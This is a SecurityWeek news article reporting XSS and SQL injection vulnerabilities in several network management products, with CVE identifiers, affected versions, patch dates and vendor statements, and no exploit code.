Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Network Security

XSS, SQLi Flaws Found in Network Management Systems

Researchers have identified several vulnerabilities in the network management system (NMS) products offered by various companies.

Researchers have identified several vulnerabilities in the network management system (NMS) products offered by various companies.

NMS solutions are designed to allow IT teams to discover and monitor devices on a network and track a network’s performance. Deral Heiland of Rapid7 and independent researcher Matthew Kienow discovered SQL injection and cross-site scripting (XSS) vulnerabilities in NMS products from Spiceworks, Ipswitch, Castle Rock Computing and Opsview.

According to Rapid7, the web application in Spiceworks Desktop is plagued by a persistent XSS vulnerability (CVE-2015-6021) that can be exploited by an unauthenticated attacker who has access to the network segment scanned by the product. The security hole affects versions 7.3.00065, 7.3.00076 and 7.4.00075.

An attacker can set up a malicious host that uses a Simple Network Management Protocol (SNMP) agent containing an XSS payload. The malicious code is executed when the attacker’s host is scanned and when the victim visits certain pages in the web interface.

The flaw was reported to Spiceworks on September 1 and it was patched on December 1 with the release of version 7.5. The vendor says it’s not aware of any exploits for the vulnerability.

The WhatsUp Gold NMS product from Ipswitch is plagued by both stored XSS (CVE-2015-6004) and SQL injection (CVE-2015-6005) vulnerabilities.

The XSS vulnerability can be exploited by an unauthenticated attacker via SNMP during the product’s network device discovery process. The malicious code gets executed when the user views the malicious device in the web interface’s discovery console.

An unauthenticated attacker can also execute arbitrary HTML and JavaScript code by injecting it into a spoofed SNMP trap message. The code is executed when the victim views the trap information in the dashboard.

Advertisement. Scroll to continue reading.

The SQL injection vulnerability in Ipswitch WhatsUp Gold can be exploited by an authenticated attacker to extract information from the database.

The vulnerabilities, which affect versions 16.3.1 and earlier, were reported by Rapid7 on September 1 and were patched on December 16 with the release of WhatsUp Gold 16.4.1. Ipswitch was first contacted about the SQL injection issue in mid-July after Owen Shearing of 7Safe reported the flaw to CERT/CC.

“At Ipswitch, we take the security of our products very seriously. As soon as the vulnerability was detected, Ipswitch developed a fix which was released on December 16 and is now available to all customers through the customer portal,” Ipswitch representatives told SecurityWeek.

A persistent XSS vulnerability (CVE-2015-6035) that can be exploited via malicious SNMP traps has also been found in Opsview. Researchers also discovered a reflected XSS vulnerability in Opsview’s NMS product.

The flaws affect versions 4.6.3 and earlier. The security holes have been fixed on November 6 with the release of Opsview 4.5.4 and 4.6.4, which address several other XSS flaws as well.

XSS and SQL injection bugs were also found in Castle Rock Computing’s SNMPc Enterprise product and its associated SNMPc OnLine reporting and monitoring tool.

The persistent XSS (CVE-2015-6027) can be exploited by an unauthenticated attacker to execute arbitrary JavaScript code in the product’s web console. Just like in the case of Ipswitch WhatsUp Gold, the malicious code can be delivered during the device discovery process or via SNMP trap messages.

The SQL injection vulnerability (CVE-2015-6028) can be leveraged by an authenticated attacker to extract information from the application database. Rapid7 has pointed out that the SQL injections found in these NMS products can easily be exploited with open source tools such as SQLMAP.

Castle Rock Computing representatives told SecurityWeek that the vulnerabilities have been confirmed and addressed by the company’s engineering team. Patches have been posted to the company’s help desk on December 17 and the fixes will also be included in the next full release of SNMPc (9.0.9), which is scheduled for release on January 4, 2016. 

*Updated with statement from Ipswitch and Castle Rock Computing

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Identity & Access

Zero trust is not a replacement for identity and access management (IAM), but is the extension of IAM principles from people to everyone and...

Cybersecurity Funding

Network security provider Corsa Security last week announced that it has raised $10 million from Roadmap Capital. To date, the company has raised $50...

Network Security

Attack surface management is nothing short of a complete methodology for providing effective cybersecurity. It doesn’t seek to protect everything, but concentrates on areas...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Identity & Access

Hackers rarely hack in anymore. They log in using stolen, weak, default, or otherwise compromised credentials. That’s why it’s so critical to break the...

Application Security

Fortinet on Monday issued an emergency patch to cover a severe vulnerability in its FortiOS SSL-VPN product, warning that hackers have already exploited the...

Cyberwarfare

Websites of German airports, administration bodies and banks were hit by DDoS attacks attributed to Russian hacker group Killnet

Network Security

A zero-day vulnerability named HTTP/2 Rapid Reset has been exploited to launch some of the largest DDoS attacks in history.